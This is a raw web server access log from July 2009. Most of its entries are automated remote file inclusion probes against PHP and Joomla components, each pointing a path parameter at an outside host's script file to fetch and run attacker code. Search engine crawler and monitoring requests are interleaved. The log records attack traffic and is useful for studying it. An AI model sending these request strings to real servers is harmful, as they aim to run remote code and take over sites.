69.13.208.131 - - [26/Jul/2009:06:12:17 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:12:49 -0400] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:12:49 -0400] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:12:49 -0400] "GET /logs/access_log.Q109061700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:06:12:52 -0400] "GET /phphtml.php?htmlclass_path=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:06:12:52 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:12:54 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
208.113.167.8 - - [26/Jul/2009:06:13:13 -0400] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 351 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:06:13:13 -0400] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 356 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:06:13:13 -0400] "GET /logs/access_log.Q109070800/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 378 "-" "libwww-perl/5.803"
66.249.68.247 - - [26/Jul/2009:06:13:21 -0400] "GET /images/_notes/nav_store_fav_over_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.246.20.221 - - [26/Jul/2009:06:13:30 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.113.167.8 - - [26/Jul/2009:06:13:45 -0400] "GET /logs/access_log.Q109070900/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 378 "-" "libwww-perl/5.803"
202.191.43.177 - - [26/Jul/2009:06:15:53 -0400] "GET /logs/access_log.Q109070800/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
202.191.43.177 - - [26/Jul/2009:06:15:54 -0400] "GET /logs/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
89.234.7.92 - - [26/Jul/2009:06:16:31 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:16:31 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:16:33 -0400] "GET /logs/access_log.Q109060300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:16:33 -0400] "GET /logs/access_log.Q109060300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:06:16:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.14 - - [26/Jul/2009:06:17:40 -0400] "GET /logs/access_log.Q109061700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:17:40 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:17:47 -0400] "GET /logs/access_log.Q109061700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:17:49 -0400] "GET /errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:17:49 -0400] "GET /logs/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:17:49 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:06:17:51 -0400] "GET /logs/access_log.Q109060400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:17:53 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:06:18:47 -0400] "GET /logs/access_log.Q109060400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:19:13 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:19:13 -0400] "GET /logs/access_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:19:28 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:19:53 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:19:53 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:06:19:57 -0400] "GET /images/_notes/ace_bkgrd_white_r2_c1.gif.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.109.250.29 - - [26/Jul/2009:06:20:17 -0400] "GET //?_zb_path=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:20:17 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:20:17 -0400] "GET /logs//?_zb_path=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:20:20 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:20:59 -0400] "GET /logs/access_log.Q109051300//?_zb_path=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:21:07 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:21:07 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:21:07 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:21:10 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:21:10 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:21:10 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:21:21 -0400] "GET /logs/error_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:06:21:29 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:21:35 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:21:44 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:21:51 -0400] "GET /phphtml.php?htmlclass_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:21:52 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:06:21:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.110.19.24 - - [26/Jul/2009:06:22:24 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:06:22:24 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:06:22:24 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:06:22:29 -0400] "GET /logs/access_log.Q109071200/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:06:22:37 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:23:00 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:23:00 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:23:00 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:23:11 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:23:51 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:06:24:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1129314E9E644900FEA200P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:06:24:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1129314E9EB4D900FEA200P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:06:24:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1129314E9EE4C900F4A200P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:06:24:35 -0400] "GET /images/bt_sep-c.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.249.68.79 - - [26/Jul/2009:06:24:43 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1129314E9E84C900FEA200P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:06:25:15 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:26:05 -0400] "GET /logs///template/album.php?SECURITY_FILE=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:26:05 -0400] "GET /logs/access_log.Q109071600%20%20///template/album.php?SECURITY_FILE=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:26:07 -0400] "GET ///template/album.php?SECURITY_FILE=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:26:10 -0400] "GET /logs/access_log.Q109071200%20%20///template/album.php?SECURITY_FILE=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:06:26:31 -0400] "GET /images/_notes/headline_summersale.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.231.126.252 - - [26/Jul/2009:06:27:56 -0400] "GET ///zb41/include/write.php?dir=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:06:27:56 -0400] "GET /logs///zb41/include/write.php?dir=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:06:27:56 -0400] "GET /logs/access_log.Q109051200///zb41/include/write.php?dir=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.113.167.8 - - [26/Jul/2009:06:28:26 -0400] "GET /logs/access_log.Q109070800///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:06:28:26 -0400] "GET /logs///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:06:28:26 -0400] "GET ///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
122.99.196.136 - - [26/Jul/2009:06:28:28 -0400] "GET /logs/access_log.Q109060400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:06:28:38 -0400] "GET /logs/access_log.Q109053100///zb41/include/write.php?dir=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.113.167.8 - - [26/Jul/2009:06:28:40 -0400] "GET /logs/access_log.Q109070900///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
61.109.250.29 - - [26/Jul/2009:06:28:52 -0400] "GET /logs/access_log.Q109071600///template/album.php?SECURITY_FILE=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:06:28:52 -0400] "GET /logs/access_log.Q109070600///template/album.php?SECURITY_FILE=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:06:29:12 -0400] "GET ///plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:06:29:22 -0400] "GET /logs///plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:06:29:22 -0400] "GET /logs/error_log.Q109060500///plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:29:43 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:29:48 -0400] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:06:29:48 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:06:29:48 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 11073 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:06:29:54 -0400] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:06:29:54 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:06:29:55 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 11073 "-" "libwww-perl/5.805"
210.109.101.217 - - [26/Jul/2009:06:30:05 -0400] "GET //embed/day.php?path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
210.109.101.217 - - [26/Jul/2009:06:30:05 -0400] "GET /logs//embed/day.php?path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
210.109.101.217 - - [26/Jul/2009:06:30:21 -0400] "GET //aedatingCMS.php?dir[inc]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.109.101.217 - - [26/Jul/2009:06:30:21 -0400] "GET /logs//aedatingCMS.php?dir[inc]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.109.101.217 - - [26/Jul/2009:06:30:21 -0400] "GET /logs/access_log.Q109051600//aedatingCMS.php?dir[inc]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
93.190.41.97 - - [26/Jul/2009:06:30:23 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 11073 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:06:30:24 -0400] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:06:30:24 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:06:30:41 -0400] "GET /logs/error_log.Q109071100////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.823"
210.109.101.217 - - [26/Jul/2009:06:30:44 -0400] "GET //aedatingCMS.php?dir[inc]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.109.101.217 - - [26/Jul/2009:06:30:44 -0400] "GET /logs//aedatingCMS.php?dir[inc]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.109.101.217 - - [26/Jul/2009:06:30:48 -0400] "GET /logs/access_log.Q109051600//aedatingCMS.php?dir[inc]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.55.105.229 - - [26/Jul/2009:06:31:36 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.229 - - [26/Jul/2009:06:31:36 -0400] "GET /logs/error_log.Q109022400 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.229 - - [26/Jul/2009:06:31:36 -0400] "GET /logs/access_log.Q108012600 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.20.186.139 - - [26/Jul/2009:06:32:38 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:32:38 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:32:41 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:32:42 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:06:33:02 -0400] "GET /logs/access_log.Q109051200%20%20///zb41/include/write.php?dir=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:06:33:06 -0400] "GET /images/_notes/iso9001.gif.mno HTTP/1.1" 200 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
